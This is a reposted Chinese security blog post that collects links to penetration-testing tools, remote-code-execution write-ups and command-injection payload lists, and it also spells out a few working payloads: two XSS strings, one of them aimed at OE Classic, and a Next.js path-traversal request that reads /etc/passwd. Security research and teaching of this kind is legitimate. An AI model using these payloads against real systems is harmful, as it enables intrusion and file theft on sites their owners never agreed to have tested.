Active Directory Attacks:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md
Open redirects can be escalated at times:
Open Redirect + Miconfigured OAuth App => OAuth Token Stealing
Open Redirect + Filtered SSRF => SSRF
Open Redirect + CRLFi => XSS
Open Redirect + javascript URI => XSS
Opportunities are endless.
网络渗透测试相关脚本、工具和记录表:
https://github.com/mgeeky/Penetration-Testing-Tools/tree/master/networks
https://github.com/nccgroup/gitpwnd
https://github.com/GoVanguard/list-pentest-tools
https://github.com/wtsxDev/Penetration-Testing
https://github.com/ralvarep/Penetration-Testing
https://github.com/portantier/habu
https://github.com/noobscode/kalel
https://github.com/koutto/jok3r
远程代码执行
https://medium.com/bugbountywriteup/rocet-remote-code-execution-tool-11efa54654d5?source=linkShare-1764222123d3-1554423196&_branch_match_id=650513107628037146
https://medium.com/bugbountywriteup/rocet-remote-code-execution-tool-11efa54654d5
https://blog.scrt.ch/2018/08/24/remote-code-execution-on-a-facebook-server/
https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2
https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1
操作系统命令注入有效负载列表和教程
Payload list:
https://github.com/ismailtasdelen/command-injection-payload-list
https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/os-cmd-execution/command-injection-template.txt
教程
https://www.youtube.com/watch?v=dQ-_TO1zuvA
https://www.youtube.com/watch?v=YYzWvXG7mjQ
https://www.youtube.com/watch?v=qLIkGJrMY9k
https://www.youtube.com/watch?v=fXdrs9b2_Ek
https://www.youtube.com/results?search_query=OS+Command+Injection
Transforming Self-XSS Into Exploitable XSS
https://www.netsparker.com/blog/web-security/transforming-self-xss-into-exploitable-xss/?utm_source=twitter.com&utm_medium=social&utm_content=transforming+self+xss+into+exploitable+xss&utm_campaign=netsparker+social+media
Findomain-一种使用证书透明度日志查找子域的工具
https://www.kitploit.com/2019/04/findomain-tool-that-use-certificate.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+PentestTools+(PenTest+Tools
Script Injection
OE Classic <= 2.8.0 RCE via stored XSS
Vulnerability
<BODY BACKGROUND="javascript:document.body.innerHTML='<textarea id=x>prompt(1,location);</textarea><button onclick=eval(document.getElementById('x').innerHTML)>run</button>';">body</BODY>
Split your XSS payload into two
Example
<img src=x & LName: onerror=prompt(0);> sometimes you will end getting Stored XSS. #bugbounty #bugbounty #tailoringXSS shoutout to for this! :)
next. js 2.4.1 中的响应框架任意文件读取
Node 服务器将反斜杠转换为向前斜杠, 因此我们可以绕过 nginx 验证。
GET /_next..................etcpasswd HTTP/1.1
暂时就更新这么多,后期有好的干货再进行分享,希望大家能长期关注本订阅号,谢谢!
原文始发于微信公众号(安全之道):一些国外干货
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论